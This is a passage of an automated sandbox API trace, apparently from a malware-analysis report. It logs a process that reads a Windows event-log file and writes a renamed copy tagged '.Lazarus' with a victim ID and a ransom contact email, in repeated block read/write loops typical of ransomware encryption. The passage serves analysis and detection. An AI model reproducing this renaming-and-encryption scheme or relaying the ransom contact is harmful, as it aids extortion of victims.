HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0085.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0085.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0085.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0085.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f90 | out: hHeap=0x20000) returned 1 [0085.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0085.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0085.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0085.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0085.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0085.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0085.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0085.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0085.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0085.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0085.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0085.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0085.767] AreFileApisANSI () returned 1 [0085.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx", lpUsedDefaultChar=0x0) returned 56 [0085.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0085.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0085.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0085.767] AreFileApisANSI () returned 1 [0085.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0085.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0085.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 56 [0085.767] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0085.768] GetFileType (hFile=0x348) returned 0x1 [0085.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0085.768] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0085.768] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0085.768] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0085.768] CloseHandle (hObject=0x348) returned 1 [0085.768] AreFileApisANSI () returned 1 [0085.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0085.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0085.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 56 [0085.769] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0085.769] GetFileType (hFile=0x348) returned 0x1 [0085.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0085.769] CloseHandle (hObject=0x348) returned 1 [0085.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0085.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0085.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0085.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0085.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0085.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0085.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0085.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0085.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0085.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0085.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0085.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0085.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0085.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0085.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0085.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0085.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0085.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0085.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0085.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0085.769] AreFileApisANSI () returned 1 [0085.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0085.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0085.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 56 [0085.770] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1dbd7c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1dbd7c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0085.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0085.770] AreFileApisANSI () returned 1 [0085.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0085.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0085.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0085.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0085.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0085.770] GetLastError () returned 0x0 [0085.770] SetLastError (dwErrCode=0x0) [0085.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e228 [0085.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x53970 [0085.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0085.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0085.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0085.770] GetLastError () returned 0x0 [0085.770] SetLastError (dwErrCode=0x0) [0085.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0085.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0085.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71758 [0085.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0085.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a2d0 [0085.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0085.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0085.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0085.771] AreFileApisANSI () returned 1 [0085.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 118 [0085.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xec) returned 0x80a30 [0085.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a2d0, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=118 | out: lpWideCharStr="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 118 [0085.771] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0085.772] GetFileType (hFile=0x348) returned 0x1 [0085.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0085.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0085.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0085.772] AreFileApisANSI () returned 1 [0085.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0085.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0085.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 56 [0085.772] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0085.772] GetFileType (hFile=0x424) returned 0x1 [0085.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0085.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0085.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.773] GetLastError () returned 0x0 [0085.773] SetLastError (dwErrCode=0x0) [0085.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.773] GetLastError () returned 0x0 [0085.773] SetLastError (dwErrCode=0x0) [0085.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0085.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0085.773] ReadFile (in: hFile=0x424, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0085.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0085.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0085.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x570e0 [0085.863] GetLastError () returned 0x0 [0085.863] SetLastError (dwErrCode=0x0) [0085.864] GetLastError () returned 0x0 [0085.864] SetLastError (dwErrCode=0x0) [0085.866] GetLastError () returned 0x0 [0085.898] SetLastError (dwErrCode=0x0) [0085.898] GetLastError () returned 0x0 [0085.898] SetLastError (dwErrCode=0x0) [0085.899] ReadFile (in: hFile=0x424, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.899] WriteFile (in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.900] GetLastError () returned 0x0 [0085.900] SetLastError (dwErrCode=0x0) [0085.900] GetLastError () returned 0x0 [0085.900] SetLastError (dwErrCode=0x0) [0085.900] GetLastError () returned 0x0 [0085.900] SetLastError (dwErrCode=0x0) [0085.900] GetLastError () returned 0x0 [0085.900] SetLastError (dwErrCode=0x0) [0085.900] ReadFile (in: hFile=0x424, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.900] WriteFile (in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.901] GetLastError () returned 0x0 [0085.901] SetLastError (dwErrCode=0x0) [0085.901] GetLastError () returned 0x0 [0085.901] SetLastError (dwErrCode=0x0) [0085.901] GetLastError () returned 0x0 [0085.901] SetLastError (dwErrCode=0x0) [0085.901] GetLastError () returned 0x0 [0085.901] SetLastError (dwErrCode=0x0) [0085.901] ReadFile (in: hFile=0x424, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.901] WriteFile (in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.902] GetLastError () returned 0x0 [0085.902] SetLastError (dwErrCode=0x0) [0085.902] GetLastError () returned 0x0 [0085.902] SetLastError (dwErrCode=0x0) [0085.902] GetLastError () returned 0x0 [0085.902] SetLastError (dwErrCode=0x0) [0085.902] GetLastError () returned 0x0 [0085.902] SetLastError (dwErrCode=0x0) [0085.902] ReadFile (in: hFile=0x424, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.902] WriteFile (in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.902] GetLastError () returned 0x0 [0085.902] SetLastError (dwErrCode=0x0) [0085.903] GetLastError () returned 0x0 [0085.903] SetLastError (dwErrCode=0x0) [0085.903] GetLastError () returned 0x0 [0085.903] SetLastError (dwErrCode=0x0) [0085.903] GetLastError () returned 0x0 [0085.903] SetLastError (dwErrCode=0x0) [0085.903] ReadFile (in: hFile=0x424, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.903] WriteFile (in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.903] GetLastError () returned 0x0 [0085.903] SetLastError (dwErrCode=0x0) [0085.903] GetLastError () returned 0x0 [0085.903] SetLastError (dwErrCode=0x0) [0085.904] GetLastError () returned 0x0 [0085.904] SetLastError (dwErrCode=0x0) [0085.904] GetLastError () returned 0x0 [0085.904] SetLastError (dwErrCode=0x0) [0085.904] ReadFile (in: hFile=0x424, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.904] WriteFile (in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.904] GetLastError () returned 0x0 [0085.904] SetLastError (dwErrCode=0x0) [0085.904] GetLastError () returned 0x0 [0085.904] SetLastError (dwErrCode=0x0) [0085.904] GetLastError () returned 0x0 [0085.905] SetLastError (dwErrCode=0x0) [0085.905] GetLastError () returned 0x0 [0085.905] SetLastError (dwErrCode=0x0) [0085.905] ReadFile (in: hFile=0x424, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.905] WriteFile (in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.905] GetLastError () returned 0x0 [0085.905] SetLastError (dwErrCode=0x0) [0085.905] GetLastError () returned 0x0 [0085.905] SetLastError (dwErrCode=0x0) [0085.905] GetLastError () returned 0x0 [0085.905] SetLastError (dwErrCode=0x0) [0085.906] GetLastError () returned 0x0 [0085.906] SetLastError (dwErrCode=0x0) [0085.906] ReadFile (in: hFile=0x424, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.906] WriteFile (in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.906] GetLastError () returned 0x0 [0085.906] SetLastError (dwErrCode=0x0) [0085.906] GetLastError () returned 0x0 [0085.906] SetLastError (dwErrCode=0x0) [0085.906] GetLastError () returned 0x0 [0085.906] SetLastError (dwErrCode=0x0) [0085.906] GetLastError () returned 0x0 [0085.906] SetLastError (dwErrCode=0x0) [0085.907] ReadFile (in: hFile=0x424, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.907] WriteFile (in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.907] GetLastError () returned 0x0 [0085.907] SetLastError (dwErrCode=0x0) [0085.907] GetLastError () returned 0x0 [0085.907] SetLastError (dwErrCode=0x0) [0085.907] GetLastError () returned 0x0 [0085.907] SetLastError (dwErrCode=0x0) [0085.907] GetLastError () returned 0x0 [0085.907] SetLastError (dwErrCode=0x0) [0085.907] ReadFile (in: hFile=0x424, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.908] WriteFile (in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.908] GetLastError () returned 0x0 [0085.908] SetLastError (dwErrCode=0x0) [0085.908] GetLastError () returned 0x0 [0085.908] SetLastError (dwErrCode=0x0) [0085.908] GetLastError () returned 0x0 [0085.908] SetLastError (dwErrCode=0x0) [0085.908] GetLastError () returned 0x0 [0085.908] SetLastError (dwErrCode=0x0) [0085.908] ReadFile (in: hFile=0x424, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.908] WriteFile (in: hFile=0x348, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.909] GetLastError () returned 0x0 [0085.909] SetLastError (dwErrCode=0x0) [0085.909] GetLastError () returned 0x0 [0085.909] SetLastError (dwErrCode=0x0) [0085.909] GetLastError () returned 0x0 [0085.909] SetLastError (dwErrCode=0x0) [0085.909] GetLastError () returned 0x0 [0085.909] SetLastError (dwErrCode=0x0) [0085.909] ReadFile (in: hFile=0x424, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.909] WriteFile 